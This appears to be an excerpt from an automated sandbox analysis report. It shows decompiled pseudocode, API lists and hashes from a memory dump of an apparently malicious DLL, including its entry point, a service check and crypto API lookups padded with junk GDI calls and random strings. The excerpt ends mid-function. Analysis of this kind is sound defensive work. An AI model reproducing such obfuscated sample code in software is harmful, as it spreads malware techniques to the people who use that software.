CreateEnhMetaFileA.GDI32(00000000,52R6ZeKe9qHeop C5O,xW8z4z9nbTZVCt0LvTX,ywg aIyN04P6GxDyg4f6aBtQy8t,PWloW RX92GPrGZUGbBRutWx4S1ditJ6msV.B QvfaCoVyVXZv7QkfkXK5heL xyP3CvelTXoSiLM7SO s1d5scdS6w7fHHIKakwwnzSvqYdYBiwzl7TPSzvGTqmdsfTd79 hsKhahcpB544 j16 SaNwKy.zlYwN0igSjkuEAJmthgZhPr97 v7jSO,8E.b,00000000,00000000), ref: 00EC5B41
ArcTo.GDI32(00000000,00000038,00000057,00000061,00000040,00000033,0000002B,00000007,0000002C,?,?,?,?,76996980,00EF5700,00000000), ref: 00EC5B82

Part of subcall function 00EC5CD5: ArcTo.GDI32(00000000,00000015,00000050,00000055,00000055,0000000C,0000002D,0000005F,00000035,00000000,00000000,00000000,?,?,00EC5B24,?), ref: 00EC5D04

Arc.GDI32(00000000,0000005B,0000001D,00000021,00000044,0000001E,00000033,0000005E,00000044), ref: 00EC5CC8

Strings

52R6ZeKe9qHeop C5O,xW8z4z9nbTZVCt0LvTX,ywg aIyN04P6GxDyg4f6aBtQy8t,PWloW RX92GPrGZUGbBRutWx4S1ditJ6msV.B QvfaCoVyVXZv7QkfkXK5heL xyP3CvelTXoSiLM7SO s1d5scdS6w7fHHIKakwwnzSvqYdYBiwzl7TPSzvGTqmdsfTd79 hsKhahcpB544 j16 SaNwKy.zlYwN0igSjkuEAJmthgZhPr97 v7jSO,8E.b, xrefs: 00EC5B3B
cSjoN5zj4IMaCjH.2wdV7iXxnkrZVISIEBR0 l8GYAFCd.Y55 kmQ2 HfJdV7uidl9VrLBv.DqoL8vBqRA 8XUEr3gCh.E0iHAieYlV 3VtqLNT7yj0H0BFoRo 9KPFC0CP YOFb6iPisElGK3xC7uWyGjxi x35 WcF7kA9Zv6tHw5K3eattOcLy7yp42o B8FSjSQnkl Vqxzc8raaljmt eX5 e2,KlHfvmJbYtb6vgKMKHj6uoIdrkYZ lbx5, xrefs: 00EC5A9A
, xrefs: 00EC5C06
, xrefs: 00EC5BE9

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ByteCharCreateErrorFileLastMetaMultiWide
String ID: $ $52R6ZeKe9qHeop C5O,xW8z4z9nbTZVCt0LvTX,ywg aIyN04P6GxDyg4f6aBtQy8t,PWloW RX92GPrGZUGbBRutWx4S1ditJ6msV.B QvfaCoVyVXZv7QkfkXK5heL xyP3CvelTXoSiLM7SO s1d5scdS6w7fHHIKakwwnzSvqYdYBiwzl7TPSzvGTqmdsfTd79 hsKhahcpB544 j16 SaNwKy.zlYwN0igSjkuEAJmthgZhPr97 v7jSO,8E.b$cSjoN5zj4IMaCjH.2wdV7iXxnkrZVISIEBR0 l8GYAFCd.Y55 kmQ2 HfJdV7uidl9VrLBv.DqoL8vBqRA 8XUEr3gCh.E0iHAieYlV 3VtqLNT7yj0H0BFoRo 9KPFC0CP YOFb6iPisElGK3xC7uWyGjxi x35 WcF7kA9Zv6tHw5K3eattOcLy7yp42o B8FSjSQnkl Vqxzc8raaljmt eX5 e2,KlHfvmJbYtb6vgKMKHj6uoIdrkYZ lbx5
API String ID: 3747196030-343353043
Opcode ID: 64271d64ebd3ea36c10f0cad22366151b47e068254c66b877eaef6868d3312ea
Instruction ID: bbec71bd89e222e02aedaf2ecdd60e60af514027aa153f0ddf62cc10613cdbea
Opcode Fuzzy Hash: 64271d64ebd3ea36c10f0cad22366151b47e068254c66b877eaef6868d3312ea
Instruction Fuzzy Hash: 56915072D00609AFDF10DF94DD86FEEBBB8EB08714F145069F604B6281E6765A86CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EC6295, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00EC6295(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8, intOrPtr* _a12, char _a16) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				char _v21;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				short _v108;
				char _v396;
				void* __esi;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr _t55;
				struct HDC__* _t56;
				struct HDC__* _t63;
				intOrPtr _t65;
				void* _t75;
				int _t77;
				intOrPtr* _t83;
				char* _t86;
				struct HDC__* _t87;
				struct HDC__* _t88;
				void* _t90;

				_t82 = __edx;
				_t78 = __ecx;
				_v8 = 0xffffffe1;
				E00ECE0AF(__ecx, __edx,  &_v20);
				BitBlt(0, 0xb, 0x27, 0xe, 0x3f, 0, 0x15, 0x5a, 0x34);
				_t86 =  &_v44;
				E00ECE0AF(__ecx, __edx, _t86);
				_v36 = _a8;
				_v32 = _a12;
				_t8 =  &_a16; // 0xec6160
				_v28 =  *_t8;
				_v24 = _t86;
				_t47 = E00ED0F67(_t78, _a4,  &_v36, 0x10, 1);
				_a12 = _t47;
				if(_t47 != 0) {
					_t83 = __imp__GetCPInfoExA;
					while(1) {
						_t49 =  *0xef56c8; // 0x520f6c8
						_t87 =  *((intOrPtr*)(_t49 + 0x2c))( *_a12, 0x3e8);
						 *_t83(0x17, 0x20,  &_v396);
						__eflags = _t87;
						if(_t87 == 0) {
							break;
						}
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							_v8 = 0xffffffde;
							L13:
							__eflags = _v8 - 0xffffffe1;
							if(_v8 != 0xffffffe1) {
								L19:
								E00ED0EFA(_a12, 1);
								return _v8;
							}
							GetLastError();
							_t63 = E00ECFE78("wk4y60h2neT8ze9yXCU,dh8mV Q4944xjDZ6TTrc.7LBmhr0cLBjox4ta.Du urY U11xk6Z lxE 2shnr4GWkDBUIgOWf7se4BLy oJJbFyobW4N5Xx 34W.WN2mccfxz h2yKuvJn20OjG0O4CnT90fwGIKzcaKw MU,W AhHi999lDFGXnv Wy9slssYRLMvaCj2hBSbRolWCGS8  hxUZSOZfFzeB,gFk 1n DtS JK0Vb SjcZMS26ynvgG6q3naBSMaKICg,BtrIgQESIo6YLag0eLz1nZkZENtYtPPDk4Mk3q8eIFGf bCxYbgUbrPsoy1u C0AILgL07Mjp2Sh6EXXf6 oiDemAkOFKhIoH0b8IuoYhQd MRAkcD44wj3jyBOMbeC5kMONvXGMtycwvJVdBXP ZCcEPC6YGl06y4 n2ZKi UzcLcUpOqH3L7aCF9EolgS DdR  woIpUsBYnxC5Eui3DQ6vl3SDO853,jWXmk YC  6MIdXdaoI3K381iFBWuQlSVyrElL Aeix xV ZtYZse0XFE u8k34JV2mQlo0M1T133J2SS.QAgI.JoGyOP eEyHnixBJnW1m6c5p gJNP,VvLbQMgHX jY16TOhApLTT clx WDA5iuz3tw9Z2W7oneDIfPXuRjcboqrplHRJ5oxZgjWdXTFKNU0SgBD0v z7zyKrck0gT fO 9Q C1fRYs0.u1 wesd PD M2,UDZ4Li,XKELtiWPZwMf7, ki40FAe.IC6oJgtrw8OxmYiV UOSl9 VHPzP4z.rItoRLsxxJYSV6Y9qXAGJOWtder1mJ4AzKe5qqj37fBN.mDxHSrd4SfkomDQ36bVzaJXP9c 413eNc 6sfs6YPTZt9NzIIhJjx3ru7HcQ mhDmzcVL2IU8gaB9tqtFe7D2LxLcsiHSiBheORdPAOUzafBDGSmzAelqfjzPTrgYjH8AIp1 JTVhbEwBb0 OU8rZ3XwbGqGqkZPShv8eC");
							_t88 = 0xf;
							__eflags = _t63 - _t88;
							if(_t63 <= _t88) {
								_t88 = _t63;
							}
							_t77 = 0;
							_v21 = 0;
							__eflags = _t88;
							if(_t88 <= 0) {
								L18:
								_t65 =  *0xef56c8; // 0x520f6c8
								 *((intOrPtr*)(_t65 + 0xc8))( *_a12, 0);
								goto L19;
							} else {
								do {
									_t30 = _t77 + 0x42; // 0x42
									 *((char*)(_t90 + _t77 - 0x20)) = _t30;
									MultiByteToWideChar(0, 0,  &_v36, 0xffffffff,  &_v108, 0x20);
									_t77 = _t77 + 1;
									__eflags = _t77 - _t88;
								} while (_t77 < _t88);
								goto L18;
							}
						}
						E00ECE0AF(_t78, _t82,  &_v20);
						Arc(0, 0x2c, 0x17, 0x1c, 0x21, 0x56, 0x54, 0x5d, 0x1c);
						_t78 = _v44 + 0xf0;
						asm("adc eax, 0x0");
						__eflags = _v16 - _v40;
						if(__eflags > 0) {
							goto L13;
						}
						if(__eflags < 0) {
							continue;
						}
						__eflags = _v20 - _t78;
						if(_v20 >= _t78) {
							goto L13;
						}
					}
					_t55 =  *0xef56c8; // 0x520f6c8
					_t56 =  *((intOrPtr*)(_t55 + 0xe4))( *_a12,  &_v8);
					__eflags = _t56;
					if(_t56 != 0) {
						 *_t83(0x1b, 0x17,  &_v396);
						goto L13;
					}
					BitBlt(_t56, 0x51, 6, 0x2f, 0x3c, _t56, 0x10, 0x47, 0x2b);
					_v8 = 0xffffffdf;
					goto L19;
				}
				_t75 = 0xffffffe0;
				return _t75;
			}

0x00ec6295
0x00ec6295
0x00ec62a4
0x00ec62ab
0x00ec62c8
0x00ec62ca
0x00ec62cd
0x00ec62d5
0x00ec62dc
0x00ec62e0
0x00ec62e3
0x00ec62ea
0x00ec62f6
0x00ec62fe
0x00ec6303
0x00ec630d
0x00ec6313
0x00ec631d
0x00ec6325
0x00ec6332
0x00ec6334
0x00ec6336
0x00000000
0x00000000
0x00ec6338
0x00ec633b
0x00ec63bc
0x00ec63c3
0x00ec63c3
0x00ec63c7
0x00ec6420
0x00ec6425
0x00000000
0x00ec642d
0x00ec63c9
0x00ec63d4
0x00ec63dc
0x00ec63dd
0x00ec63df
0x00ec63e1
0x00ec63e1
0x00ec63e5
0x00ec63e7
0x00ec63eb
0x00ec63ed
0x00ec640f
0x00ec6415
0x00ec641a
0x00000000
0x00ec63ef
0x00ec63ef
0x00ec63f1
0x00ec63f4
0x00ec6404
0x00ec640a
0x00ec640b
0x00ec640b
0x00000000
0x00ec63ef
0x00ec63ed
0x00ec6340
0x00ec6357
0x00ec6363
0x00ec6369
0x00ec636c
0x00ec636f
0x00000000
0x00000000
0x00ec6371
0x00000000
0x00000000
0x00ec6373
0x00ec6376
0x00000000
0x00000000
0x00ec6378
0x00ec6383
0x00ec6388
0x00ec638e
0x00ec6390
0x00ec63b8
0x00000000
0x00ec63b8
0x00ec63a2
0x00ec63a4
0x00000000
0x00ec63a4
0x00ec6307
0x00000000

APIs

Part of subcall function 00ECE0AF: GetSystemTimeAsFileTime.KERNEL32(00EC8610,?,?,?,00EC8610,00000000), ref: 00ECE0B8
Part of subcall function 00ECE0AF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ECE0D8

BitBlt.GDI32(00000000,0000000B,00000027,0000000E,0000003F,00000000,00000015,0000005A,00000034), ref: 00EC62C8
GetCPInfoExA.KERNEL32(00000017,00000020,?), ref: 00EC6332
Arc.GDI32(00000000,0000002C,00000017,0000001C,00000021,00000056,00000054,0000005D,0000001C), ref: 00EC6357
BitBlt.GDI32(00000000,00000051,00000006,0000002F,0000003C,00000000,00000010,00000047,0000002B), ref: 00EC63A2

Strings

`a, xrefs: 00EC62E0
wk4y60h2neT8ze9yXCU,dh8mV Q4944xjDZ6TTrc.7LBmhr0cLBjox4ta.Du urY U11xk6Z lxE 2shnr4GWkDBUIgOWf7se4BLy oJJbFyobW4N5Xx 34W.WN2mccfxz h2yKuvJn20OjG0O4CnT90fwGIKzcaKw MU,W AhHi999lDFGXnv Wy9slssYRLMvaCj2hBSbRolWCGS8 hxUZSOZfFzeB,gFk 1n DtS JK0Vb SjcZMS26ynvgG6q3n, xrefs: 00EC63CF

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Time$FileInfoSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: `a$wk4y60h2neT8ze9yXCU,dh8mV Q4944xjDZ6TTrc.7LBmhr0cLBjox4ta.Du urY U11xk6Z lxE 2shnr4GWkDBUIgOWf7se4BLy oJJbFyobW4N5Xx 34W.WN2mccfxz h2yKuvJn20OjG0O4CnT90fwGIKzcaKw MU,W AhHi999lDFGXnv Wy9slssYRLMvaCj2hBSbRolWCGS8 hxUZSOZfFzeB,gFk 1n DtS JK0Vb SjcZMS26ynvgG6q3n
API String ID: 2868191338-249948290
Opcode ID: 2e5c48b1f9ff5000b485eb071dc59ca83a60e1d515749aab40ed24f422988ed0
Instruction ID: a23c027944fc20478ae1636472897405d5de91e615aab948debad244b4509fea
Opcode Fuzzy Hash: 2e5c48b1f9ff5000b485eb071dc59ca83a60e1d515749aab40ed24f422988ed0
Instruction Fuzzy Hash: 56515B31A40349EFEB20DB98CD46FEE77B4EB48B10F101129FB15BB2D1D6B199469B60

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1B51, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 97
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00ED1B51() {
				void* _v8;
				void* _v12;
				long _v16;
				_Unknown_base(*)()* _v20;
				struct HINSTANCE__* _v24;
				signed int _t33;
				signed int _t35;
				signed int _t46;

				if( *0xef57c0 == 0) {
					_v24 = GetModuleHandleA(0);
					_v20 = _v20 & 0x00000000;
					if(_v24 != 0) {
						_v20 = GetProcAddress(_v24, "_OPENSSL_isservice");
					}
					if(_v20 != 0) {
						 *0xef57c0 = _v20;
					} else {
						 *0xef57c0 =  *0xef57c0 | 0xffffffff;
					}
				}
				if( *0xef57c0 == 0xffffffff) {
					_t33 = GetProcessWindowStation();
					_v8 = _t33;
					if(_v8 != 0) {
						_t35 = GetUserObjectInformationW(_v8, 2, 0, 0,  &_v16);
						if(_t35 != 0) {
							L12:
							return _t35 | 0xffffffff;
						}
						_t35 = GetLastError();
						if(_t35 == 0x7a) {
							if(_v16 <= 0x200) {
								_v16 = _v16 + 1;
								_v16 = _v16 & 0xfffffffe;
								_v12 = malloc(_v16 + 2);
								_t46 = GetUserObjectInformationW(_v8, 2, _v12, _v16,  &_v16);
								if(_t46 != 0) {
									_v16 = _v16 + 1;
									_v16 = _v16 & 0xfffffffe;
									 *((short*)(_v12 + (_v16 >> 1) * 2)) = 0;
									if(E00ED1B39(_v12, L"Service-0x") == 0) {
										return 0;
									}
									return 1;
								}
								return _t46 | 0xffffffff;
							}
							return _t35 | 0xffffffff;
						}
						goto L12;
					}
					return _t33 | 0xffffffff;
				} else {
					return  *0xef57c0();
				}
			}

0x00ed1b5e
0x00ed1b68
0x00ed1b6b
0x00ed1b73
0x00ed1b83
0x00ed1b83
0x00ed1b8a
0x00ed1b98
0x00ed1b8c
0x00ed1b8c
0x00ed1b8c
0x00ed1b8a
0x00ed1ba4
0x00ed1bb1
0x00ed1bb7
0x00ed1bbe
0x00ed1bd5
0x00ed1bdd
0x00ed1bea
0x00000000
0x00ed1bea
0x00ed1bdf
0x00ed1be8
0x00ed1bf9
0x00ed1c04
0x00ed1c0d
0x00ed1c1d
0x00ed1c2f
0x00ed1c37
0x00ed1c42
0x00ed1c4b
0x00ed1c58
0x00ed1c6d
0x00000000
0x00ed1c76
0x00000000
0x00ed1c71
0x00000000
0x00ed1c39
0x00000000
0x00ed1bfb
0x00000000
0x00ed1be8
0x00000000
0x00ed1ba6
0x00000000
0x00ed1ba6

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00ED1B62
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00ED1B7D
GetProcessWindowStation.USER32 ref: 00ED1BB1
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?), ref: 00ED1BD5
GetLastError.KERNEL32 ref: 00ED1BDF
malloc.MSVCRT ref: 00ED1C16
GetUserObjectInformationW.USER32(00000000,00000002,?,00000200,00000200), ref: 00ED1C2F

Strings

Service-0x, xrefs: 00ED1C5C
_OPENSSL_isservice, xrefs: 00ED1B75

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindowmalloc
String ID: Service-0x$_OPENSSL_isservice
API String ID: 526578184-1672312481
Opcode ID: 2cf56941308d01d57854b0d61912a8af544a2e59565243fb8406bb1bdd8fb881
Instruction ID: 80abcced5176d2b041269f2dbf987dda26da269104237e6894b94641087df076
Opcode Fuzzy Hash: 2cf56941308d01d57854b0d61912a8af544a2e59565243fb8406bb1bdd8fb881
Instruction Fuzzy Hash: 22311931D50608EFDB249BA9D849BADBBB4FB04325F105697E132F62E0E7B05A46CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00EDF4AD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00EDF4AD(signed int __eax, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t20;
				signed int _t21;
				int _t23;
				char* _t32;
				char* _t34;
				void* _t46;
				signed int _t49;
				char* _t51;
				void* _t52;
				long long* _t55;

				_t20 = __eax;
				if(_a20 == 0) {
					_a20 = 0x11;
				}
				_t34 = _a4;
				_push(_t36);
				 *_t55 = _a12;
				_push(_a20);
				_push("%.*g");
				_push(_a8);
				_push(_t34);
				L00EDFD40();
				_t49 = _t20;
				if(_t49 >= 0) {
					_a20 = _t49;
					if(_t49 >= _a8) {
						goto L3;
					}
					L00EDFD52();
					_t23 =  *((intOrPtr*)( *_t20));
					if(_t23 != 0x2e) {
						_t32 = strchr(_t34, _t23);
						if(_t32 != 0) {
							 *_t32 = 0x2e;
						}
					}
					if(strchr(_t34, 0x2e) != 0 || strchr(_t34, 0x65) != 0) {
						L12:
						_t51 = strchr(_t34, 0x65);
						if(_t51 == 0) {
							L20:
							_t21 = _a20;
							L21:
							return _t21;
						}
						_t52 = _t51 + 1;
						_t15 = _t52 + 1; // 0x2
						_t46 = _t15;
						if( *_t52 == 0x2d) {
							_t52 = _t46;
						}
						while( *_t46 == 0x30) {
							_t46 = _t46 + 1;
						}
						if(_t46 != _t52) {
							memmove(_t52, _t46, _a20 - _t46 + _t34);
							_a20 = _a20 + _t52 - _t46;
						}
						goto L20;
					} else {
						_t9 = _t49 + 3; // 0x4
						_t20 = _t9;
						if(_t20 >= _a8) {
							goto L3;
						}
						_t34[_t49] = 0x302e;
						( &(_t34[2]))[_t49] = 0;
						_a20 = _t49 + 2;
						goto L12;
					}
				}
				L3:
				_t21 = _t20 | 0xffffffff;
				goto L21;
			}

0x00edf4ad
0x00edf4b4
0x00edf4b6
0x00edf4b6
0x00edf4c1
0x00edf4c6
0x00edf4c7
0x00edf4ca
0x00edf4cd
0x00edf4d2
0x00edf4d5
0x00edf4d6
0x00edf4db
0x00edf4e2
0x00edf4ec
0x00edf4f2
0x00000000
0x00000000
0x00edf4f4
0x00edf4fb
0x00edf4ff
0x00edf506
0x00edf50f
0x00edf511
0x00edf511
0x00edf50f
0x00edf520
0x00edf549
0x00edf551
0x00edf557
0x00edf589
0x00edf589
0x00edf58c
0x00edf58f
0x00edf58f
0x00edf559
0x00edf55e
0x00edf55e
0x00edf561
0x00edf563
0x00edf563
0x00edf568
0x00edf567
0x00edf567
0x00edf56f
0x00edf57b
0x00edf585
0x00edf585
0x00000000
0x00edf530
0x00edf530
0x00edf530
0x00edf536
0x00000000
0x00000000
0x00edf538
0x00edf53e
0x00edf546
0x00000000
0x00edf546
0x00edf520
0x00edf4e4
0x00edf4e4
0x00000000

APIs

_snprintf.MSVCRT ref: 00EDF4D6
localeconv.MSVCRT ref: 00EDF4F4
strchr.MSVCRT ref: 00EDF506
strchr.MSVCRT ref: 00EDF517
strchr.MSVCRT ref: 00EDF525
strchr.MSVCRT ref: 00EDF54C
memmove.MSVCRT ref: 00EDF57B

Strings

%.*g, xrefs: 00EDF4CD

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: strchr$_snprintflocaleconvmemmove
String ID: %.*g
API String ID: 3793506855-952554281
Opcode ID: 23648a3a96fbb74297248b9e4c1f7d0759f9050b465860820e950daee92d1635
Instruction ID: 5aa802b3599ad1410212ea0cfdd7634538f3bf4b01b9941676d717b5082f003f
Opcode Fuzzy Hash: 23648a3a96fbb74297248b9e4c1f7d0759f9050b465860820e950daee92d1635
Instruction Fuzzy Hash: 8F2103724046065EDB21DE24EC42BAB7B99EF11364F102027F856AA381D770ED42C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 00EC33AB, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 87
filethreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __ecx, void* __edx, void* __edi, struct HINSTANCE__* _a4, void* _a8) {
				char _v12;
				short _v532;
				void* __esi;
				void* _t14;
				long _t20;
				intOrPtr _t25;
				void* _t26;
				long _t27;
				void* _t31;
				intOrPtr* _t37;
				void* _t40;

				_t31 = __edi;
				_t30 = __edx;
				if(_a8 != 1) {
					if(_a8 == 0) {
						TerminateThread( *0xef56c0, 0);
					}
					L11:
					E00EC85FF(_t30);
					L12:
					return 1;
				}
				E00ECD162();
				_t14 = E00ECE0AF(__ecx, __edx,  &_v12);
				_t40 = __edx;
				if(_t40 > 0 || _t40 >= 0 && _t14 >= 0x2c643) {
					_push(_t31);
					E00ECE8C6();
					 *0xef56c4 = GetModuleHandleA(0);
					 *0xef56dc = _a4;
					CreateEnhMetaFileA(0, "Y,1RD wIo9CisUqfsMkeXDnjkCM6x7OPiIYs45uwYAKn9icTIvF0bP,T 5rB0cdpTxaH2HesJNLLn TK2UpWHNCb  Mo0Mm rvwcHcahwiECJy78 42fw,Ljlpqnc zujROhdTeIghS337dpUbprjWnOr7M1J m olOZ4Wzo3O1bnCd.iRCSrH9CrNl4texufrAyw7t.rPJjyPv,F.XwLCBtbeOFQTaniStQ7iwTULoe4D28qxZ.g,kuvWFs,bV0FGZ.qXFgHnCKam1umGxt qEOHWhlBsghltNOMiYw4OxB0Mx5,djYw8 c6J9HszqYgNo4rUKcBuInlww2dVZPrTLOB5epoH7KhxbsrFKiWmF p x5  aPsfvZJgseWuDReU AZVXgHwYwWy6zurmGHK 1MQbmh.xY4, sa,,9ck6zN115PhqjiFTrXqDJau kXfsRReJ1hm9hsppgK1KWdsAFd1KnJqSmStaPbsxhOpr QdoDpp4ue63uCjO KY7ZugJx,sPrPL6RVs386 y3Ge9XV80fWP8zgbA7,5nL iOSOVEzJDP8ZaWZV.zkudHHb9r,iSl,xRpeHd5pToPWiQ6i 4 AqQpNzV5A1yOUxlc RJBl8b.X g4dT8Uxb5TL3xFj,jb6KE0LS.akyXdiy3u2zQqx6LprAJ0t6kq6Oor igyA9aeC5afvURZYJEVzWi4.csZbmmwOibe.J9FFbqIAbHDNFKKgU zkvKK 5PeYYtuhiiH 74PsW54ONG1e5WYv2mWsCccHDRq,NfME0 MwzkLy4zSVxtXOX2pZq8YCv,ROiR q7VfgfHxqTmA6WY1mlD0HXjNCfOb6vyllPBPEMiLFZdEXzs 1T.nFcbWOKfnvYDaw5Vkfi5FBLeVLqyqxvcsh bhscvE8p7..ULJuM604b Rd54 0PYyEVjDdKjzUiAROCgzCVMoG9PONTnt9qEu19KBHJSpbIRWIvf kN3SFwtr.XEp1tILfpnBfMFqKt4WLb50FTTVLt4M b7.m1ZmkKD,pkxW fHrVAjo2. 6SwsdaXzkA.CKDL3j s3O1z8UPh0YUlkr90WncXE w5rwEA.R7RSpb47DeqPalCETu8K0al 5cR7 l, 7WxGjQklcCwoqKJuhxsH daTEU9f14p72oHUpgvPhEaVliQXM", 0, 0);
					_t20 = GetModuleFileNameW( *0xef56dc,  &_v532, 0x104);
					_t27 = GetLastError();
					BitBlt(0, 0x2b, 0x31, 0x30, 0x1c, 0, 0x59, 0x53, 0x33);
					if(_t20 != 0) {
						if(_t27 == 0x7a) {
							goto L5;
						}
						E00EDC51D( *0xef56dc);
						 *_t37 = 0x6e2;
						_t25 = E00ED050A();
						 *0xef56c8 = _t25;
						_a8 = 0;
						_t26 =  *((intOrPtr*)(_t25 + 0x70))(0, 0, E00EC3182, 0, 0,  &_a8, 0xee47b0, 0x114);
						 *0xef56c0 = _t26;
						if(_t26 != 0) {
							goto L11;
						}
					}
					L5:
					return 0;
				} else {
					goto L12;
				}
			}

0x00ec33ab
0x00ec33ab
0x00ec33ba
0x00ec349e
0x00ec34a7
0x00ec34a7
0x00ec34ad
0x00ec34ad
0x00ec34b2
0x00000000
0x00ec34b4
0x00ec33c0
0x00ec33c8
0x00ec33cf
0x00ec33d1
0x00ec33e4
0x00ec33e5
0x00ec33f3
0x00ec3401
0x00ec3406
0x00ec341e
0x00ec343c
0x00ec343e
0x00ec3447
0x00ec3450
0x00000000
0x00000000
0x00ec3458
0x00ec345d
0x00ec346e
0x00ec3483
0x00ec3488
0x00ec348b
0x00ec348e
0x00ec3495
0x00000000
0x00000000
0x00ec3497
0x00ec3449
0x00000000
0x00000000
0x00000000
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00EC34A7

Part of subcall function 00ECD162: HeapCreate.KERNELBASE(00000000,00080000,00000000,00EC33C5), ref: 00ECD16B

Part of subcall function 00ECE0AF: GetSystemTimeAsFileTime.KERNEL32(00EC8610,?,?,?,00EC8610,00000000), ref: 00ECE0B8
Part of subcall function 00ECE0AF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ECE0D8

GetModuleHandleA.KERNEL32(00000000), ref: 00EC33EB
CreateEnhMetaFileA.GDI32(00000000,Y,1RD wIo9CisUqfsMkeXDnjkCM6x7OPiIYs45uwYAKn9icTIvF0bP,T 5rB0cdpTxaH2HesJNLLn TK2UpWHNCb Mo0Mm rvwcHcahwiECJy78 42fw,Ljlpqnc zujROhdTeIghS337dpUbprjWnOr7M1J m olOZ4Wzo3O1bnCd.iRCSrH9CrNl4texufrAyw7t.rPJjyPv,F.XwLCBtbeOFQTaniStQ7iwTULoe4D28qxZ.g,kuvWFs,bV0FGZ.,00000000,00000000), ref: 00EC3406
GetModuleFileNameW.KERNEL32(?,00000104), ref: 00EC341E
GetLastError.KERNEL32 ref: 00EC3426
BitBlt.GDI32(00000000,0000002B,00000031,00000030,0000001C,00000000,00000059,00000053,00000033), ref: 00EC343E

Strings

Y,1RD wIo9CisUqfsMkeXDnjkCM6x7OPiIYs45uwYAKn9icTIvF0bP,T 5rB0cdpTxaH2HesJNLLn TK2UpWHNCb Mo0Mm rvwcHcahwiECJy78 42fw,Ljlpqnc zujROhdTeIghS337dpUbprjWnOr7M1J m olOZ4Wzo3O1bnCd.iRCSrH9CrNl4texufrAyw7t.rPJjyPv,F.XwLCBtbeOFQTaniStQ7iwTULoe4D28qxZ.g,kuvWFs,bV0FGZ., xrefs: 00EC33FB
z, xrefs: 00EC344D

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: File$CreateModuleTime$ErrorHandleHeapLastMetaNameSystemTerminateThreadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: Y,1RD wIo9CisUqfsMkeXDnjkCM6x7OPiIYs45uwYAKn9icTIvF0bP,T 5rB0cdpTxaH2HesJNLLn TK2UpWHNCb Mo0Mm rvwcHcahwiECJy78 42fw,Ljlpqnc zujROhdTeIghS337dpUbprjWnOr7M1J m olOZ4Wzo3O1bnCd.iRCSrH9CrNl4texufrAyw7t.rPJjyPv,F.XwLCBtbeOFQTaniStQ7iwTULoe4D28qxZ.g,kuvWFs,bV0FGZ.$z
API String ID: 2288072768-1700428439
Opcode ID: ef0d9ae6298597467ff553ae400580ea0a0290462ca1e2b558896885597fe05e
Instruction ID: 1c1eb058567bc8ccfd11c8f8c36a598e810011eccd0db81579b531549eb76a47
Opcode Fuzzy Hash: ef0d9ae6298597467ff553ae400580ea0a0290462ca1e2b558896885597fe05e
Instruction Fuzzy Hash: AA212632501624AFD7266B72FD8EF9E3B99FB15750F009429F620F50A0C6B64A46CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EDFC17, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00EDFC17(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				struct HINSTANCE__* _t14;
				_Unknown_base(*)()* _t15;
				void* _t17;
				_Unknown_base(*)()* _t18;
				void* _t23;
				void* _t25;
				signed int _t28;
				struct HINSTANCE__* _t31;
				intOrPtr* _t32;
				void* _t37;

				_v8 = _v8 & 0x00000000;
				_t14 = GetModuleHandleA("advapi32.dll");
				_t31 = _t14;
				if(_t31 != 0) {
					_t15 = GetProcAddress(_t31, "CryptAcquireContextA");
					_v12 = _t15;
					if(_t15 == 0) {
						L7:
						_t17 = 1;
						L11:
						return _t17;
					}
					_t18 = GetProcAddress(_t31, "CryptGenRandom");
					_v16 = _t18;
					if(_t18 == 0) {
						goto L7;
					}
					_t32 = GetProcAddress(_t31, "CryptReleaseContext");
					if(_t32 == 0) {
						goto L7;
					}
					_push(0xf0000000);
					_push(1);
					_push(0);
					_push(0);
					_push( &_v8);
					if(_v12() == 0) {
						goto L7;
					}
					_t23 = _v16(_v8, 4,  &_v20);
					 *_t32(_v8, 0);
					if(_t23 != 0) {
						_t28 = 0;
						_t25 = 0;
						do {
